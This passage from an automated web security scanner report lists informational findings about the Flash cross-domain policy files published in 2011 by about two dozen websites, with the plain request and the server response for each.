Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:31:40 GMT
Content-Length: 221
Connection: close
Set-Cookie: M7F1=CT; expires=Sat, 30-Apr-2011 13:31:40 GMT; path=/; domain=autotraderstatic.com
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELi OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV;"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="ads.autotrader.com" />
</
...[SNIP]...

7.502. http://www.blackplanet.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackplanet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Content-Length: 257
Keep-Alive: timeout=120, max=470
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="st.bpcdn.us" />
<allow-access-from domain="pi.bpcdn.us" />
...[SNIP]...

7.503. http://www.boston.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:56 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT
Accept-Ranges: bytes
Content-Length: 1310
Served-By: garrick
Keep-Alive: timeout=30
Connection: close
Content-Type: application/xml
Set-Cookie: bcpage=0;expires=Sun, 06-Mar-2016 13:42:56 GMT;path=/;domain=boston.com;

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="boston.com" />
<allow-access-from domain="cache.boston.com" />
<allow-access-from domain="cachelection.boston.com" />
<allow-access-from domain="dev.xif.com" />
<allow-access-from domain="explorenewengland.com" />
<allow-access-from domain="graphics.boston.com" />
<allow-access-from domain="necn.dsys.worldnow.com" />
<allow-access-from domain="necn.dua.worldnow.com" />
<allow-access-from domain="oastest.boston.com" />
<allow-access-from domain="re.boston.com" />
<allow-access-from domain="rmedia.boston.com" />
<allow-access-from domain="video.boston.com" />
<allow-access-from domain="video.necn.com" />
<allow-access-from domain="video.nesn.com" />
<allow-access-from domain="workbench.boston.com" />
<allow-access-from domain="realestate.boston.com" />
...[SNIP]...
<allow-access-from domain="www.explorenewengland.com" />
<allow-access-from domain="www.private.boston.com" />
<allow-access-from domain="objects.tremormedia.com" />
<allow-access-from domain="redir.adap.tv" />
...[SNIP]...

7.504. http://www.christianbook.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christianbook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.christianbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:12 GMT
Server: Apache/1.3.42 (Unix) mod_perl/1.31
Last-Modified: Fri, 26 Oct 2007 15:22:06 GMT
ETag: "b-146-4722061e"
Accept-Ranges: bytes
Content-Length: 326
Keep-Alive: timeout=120, max=454
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="christianbook.com" />
<allow-a
...[SNIP]...
<allow-access-from domain="graphics.christianbook.com" />
...[SNIP]...

7.505. http://www.chuckecheese.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chuckecheese.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chuckecheese.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 30 Jun 2010 20:09:45 GMT
ETag: "578759-140-ef5b7440"
Accept-Ranges: bytes
Content-Length: 320
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="dev.chuckecheese.com" />
   <allow-access-from domain="chuckecheese.com" />
...[SNIP]...

7.506. http://www.cincinnati.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cincinnati.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cincinnati.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:52 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 06:42:13 GMT
ETag: "1081e3f-33f-46ee1169e1b40"
Accept-Ranges: bytes
Content-Length: 831
Wx: D=1079 t=1301752252167800 w=3
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="submit.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="mx.pointroll.com" />
<allow-access-from domain="geo.pointroll.com" />
<allow-access-from domain="ll.pointroll.com" />
<allow-access-from domain="clk.pointroll.com" />
<allow-access-from domain="clients.pointroll.com" />
<allow-access-from domain="fdaf.pointroll.com" />
<allow-access-from domain="demo.pointroll.net" />
...[SNIP]...

7.507. http://www.continental.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.continental.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.continental.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1800
Content-Length: 1091
Content-Type: text/xml
Last-Modified: Wed, 07 Apr 2010 20:06:07 GMT
Accept-Ranges: bytes
ETag: "51dd6fc28dd6ca1:35ee"
X-Powered-By: ASP.NET
Server: Continental Airlines, Inc.
Date: Sat, 02 Apr 2011 14:15:45 GMT
Connection: close
Set-Cookie: v1st=FAA76B6551E778BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.continental.com

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.uk.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="nhqsinsmktg02" />
...[SNIP]...

7.508. http://www.deadline.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deadline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deadline.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 01 Mar 2011 01:37:40 GMT
ETag: "8ca98e-db-49d61d7844100"
X-Server-Name: 01-www-alice
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:52:44 GMT
Content-Length: 219
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.paramount.com" />
</c
...[SNIP]...

7.509. http://www.deviantart.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deviantart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deviantart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:14 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 05:07:29 GMT
ETag: "1c0003a3-2ba-49e7e67a86640"
Accept-Ranges: bytes
Content-Length: 698
_eep-Alive: timeout=45
_onnection: Keep-Alive
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.deviantart.com" />
<
...[SNIP]...
<allow-access-from domain="st.deviantart.com" />
<allow-access-from domain="staging.deviantart.com" />
...[SNIP]...

7.510. http://www.dreamstime.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dreamstime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dreamstime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:27 GMT
Server: Apache
Last-Modified: Thu, 09 Apr 2009 12:12:12 GMT
ETag: "3f0421-1db-4671e2870bf00"
Accept-Ranges: bytes
Content-Length: 475
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="picfindr.com" />
<allow-access-from domain="www.picfindr.com" />
<allow-access-from domain="spimeo.com" />
<allow-access-from domain="www.spimeo.com" />
...[SNIP]...
<allow-access-from domain="thumbs.dreamstime.com" />
...[SNIP]...

7.511. http://www.elyrics.net/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elyrics.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Last-Modified: Tue, 21 Sep 2010 16:59:44 GMT
ETag: "1848a61-1c0-490c7f4a22000"
Accept-Ranges: bytes
Content-Length: 448
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM \"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.layoutstar.com" />
<allow-access-from domain="layoutstar.com" />
<allow-access-from domain="srv100.com" />
<allow-access-from domain="www.srv100.com" />
<allow-access-from domain="74.55.225.74" />
<allow-access-from domain="images.elyrics.net" />
...[SNIP]...

7.512. http://www.elyricsworld.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elyricsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
Last-Modified: Thu, 10 Dec 2009 15:47:52 GMT
ETag: "100f8b-8d-47a61bad85a00"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="widget.elyricsworld.com"/>
</cross-domain-policy>

7.513. http://www.epicurious.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epicurious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.epicurious.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 29 Sep 2010 21:34:57 GMT
ETag: "c65b3-161-4916cbb9d8240"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:01 GMT
Content-Length: 353
Connection: close
Cache-Control: max-age=600
Expires: Thu, 31 Mar 2011 19:17:43 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="rsu.feedroom.com" />
<allow-access-from domain="feedroom.com" />
<allow-access-from domain="survey.eqr1.com" />
<allow-access-from domain="ads.pointroll.com" />
...[SNIP]...

7.514. http://www.greatschools.org/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatschools.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.greatschools.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.8e mod_jk/1.2.28
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:18:15 GMT
Keep-Alive: timeout=15, max=991
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jan 2010 23:35:44 GMT
Content-Length: 584
Connection: close

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from d
...[SNIP]...
<allow-access-from domain="greatschools.org" />
...[SNIP]...
<allow-access-from domain="staging.greatschools.org" />
<allow-access-from domain="dev.greatschools.org" />
...[SNIP]...

7.515. http://www.icontact.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icontact.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.icontact.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:52 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.12-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 17 Nov 2010 21:30:01 GMT
ETag: "234-4954660324840"
Accept-Ranges: bytes
Content-Length: 564
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="icontact.com" />
   <allow-access-from domain="icontactplus.com" />
   <allow-access-from domain="plus.icontact.com" />
   <allow-access-from domain="videos.icontact.com" />
...[SNIP]...

7.516. http://www.inbox.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.inbox.com

Response

HTTP/1.1 200 OK
Content-Length: 106
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 12:43:54 GMT
Accept-Ranges: bytes
ETag: "9ea62a4deaeacb1:33ef"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:24 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="" />
</cross-domain-policy>

7.517. http://www.iwon.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.iwon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:47 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 21:52:39 GMT
ETag: "588da-3e8-49fe26db757c0"
Accept-Ranges: bytes
Content-Length: 1000
P3P: policyref="http://c4.iwon.com/w3c/p3p.xml", CP="CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Connection: close
Content-Type: application/xml
Set-Cookie: ltm=2130926090.20480.0000; expires=Sat, 16-Apr-2011 13:31:46 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy>
<allow-access-from domain="i1img.com" />
<allow-access-from domain="ak.imgfarm.com" />
<allow-access-from domain="kc1907.jeeves.ask.info" />
<allow-access-from domain="http://fhhgydaa.joyent.us"/>
<allow-access-from domain="http://fhhgydaa.joyent.us"/>
<allow-access-from domain="http://fhhgydab.joyent.us"/>
<allow-access-from domain="http://fhhgydac.joyent.us"/>
<allow-access-from domain="http://fhhgydad.joyent.us"/>
<allow-access-from domain="http://fhhgydae.joyent.us"/>
<allow-access-from domain="http://fhhgydaf.joyent.us"/>
<allow-access-from domain="http://fhhgydag.joyent.us"/>
<allow-access-from domain="http://fhhgydak.joyent.us"/>
<allow-access-from domain="http://fhhgydal.joyent.us"/>
<allow-access-from domain="http://www.facebook.com"/>
<allow-access-from domain="http://api.facebook.com"/>
...[SNIP]...

7.518. http://www.justluxe.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justluxe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.justluxe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 07 May 2009 06:14:13 GMT
ETag: "13f8306-147-4694c6bbfb740"
Accept-Ranges: bytes
Content-Length: 327
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="www.luxevegas.com" />
<allow-access-from domain="luxevegas.com" />
<allow-access-from domain="dev.luxevegas.com" />
<allow-access-from domain="www.just
...[SNIP]...
<allow-access-from domain="justluxe.com" />
<allow-access-from domain="dev.justluxe.com" />
...[SNIP]...

7.519. http://www.kazaa.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kazaa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kazaa.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 05:43:23 GMT
ETag: "1579160-162-49ea723ba94c0"
Accept-Ranges: bytes
Content-Length: 354
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="kazaa.com"/>
<allow-access-from domain="stage.kazaa.com"/>
...[SNIP]...
<allow-access-from domain="www.stage.kazaa.com"/>
...[SNIP]...

7.520. http://www.kodak.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodak.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kodak.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 317
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:42:08 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="download.kodak.com" />
<allow-access-from domain="pgatour.com" />
<allow-access-from domain="i.cdn.turner.com" />
...[SNIP]...

7.521. http://www.livejournal.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws08
Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT
ETag: "458fbb-26b-49eb04f04f400"
Keep-Alive: timeout=30, max=100
Content-Type: text/xml
X-Debug: USen (null) (null)
X-VWS-Id: bil1-varn08
Content-Length: 619
Date: Sat, 02 Apr 2011 13:26:47 GMT
X-Varnish: 888943455 884829416
Age: 36787
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-coss-domain-polic
...[SNIP]...
<allow-access-from domain="wh.lj.ru"/>
<allow-access-from domain="ljaqua.wh.lj.ru"/>
<allow-access-from domain="swfplayer.services.livejournal.com"/>
<allow-access-from domain="player.livejournal.ru"/>
<allow-access-from domain="player.championat.net"/>
<allow-access-from domain="player.gazeta.ru"/>
<allow-access-from domain="player.quto.ru"/>
...[SNIP]...

7.522. http://www.loc.gov/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loc.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.loc.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:49 GMT
Server: Apache
Last-Modified: Sat, 08 Jan 2011 01:08:58 GMT
ETag: "591a-df-61211e80"
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.loc.gov" to-ports="80"/>

...[SNIP]...

7.523. http://www.lowfares.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowfares.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lowfares.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:41 GMT
Server: Apache/2.0.52 (CentOS)
Set-Cookie: browser_info=non_mobile%3Aunknown%3Aunknown%3Adefault; path=/; expires=Thu, 07-Apr-2011 14:05:41 GMT
Set-Cookie: sid=1; path=/; expires=Tue, 01-Apr-2014 14:05:41 GMT
Set-Cookie: pageview=0; path=/; expires=Sat, 02-Apr-2011 15:05:41 GMT
Set-Cookie: lowfares=zA2gPjUtl01RBwsAAA; domain=.lowfares.com; path=/; expires=Tue, 01-Apr-2014 14:05:41 GMT
Content-Length: 140
P3P: policyref="/static/policy.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close

<cross-domain-policy>
<allow-access-from domain="www.imageality.com"></allow-access-from>
</cross-domain-policy>
<!-- page_complete -->

7.524. http://www.lyricsmode.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyricsmode.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lyricsmode.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:26:28 GMT
Content-Type: text/xml
Content-Length: 119
Last-Modified: Mon, 22 Oct 2007 13:08:20 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?><cross-domain-policy>    <allow-access-from domain="widget.lyricsmode.com"/></cross-domain-policy>

7.525. http://www.marriott.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.33 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 03 Mar 2010 20:37:16 GMT
ETag: "15-354-72a61700"
Accept-Ranges: bytes
Content-Length: 852
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=4204
Expires: Sat, 02 Apr 2011 14:43:37 GMT
Date: Sat, 02 Apr 2011 13:33:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
   <allow-access-from domain="cache.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
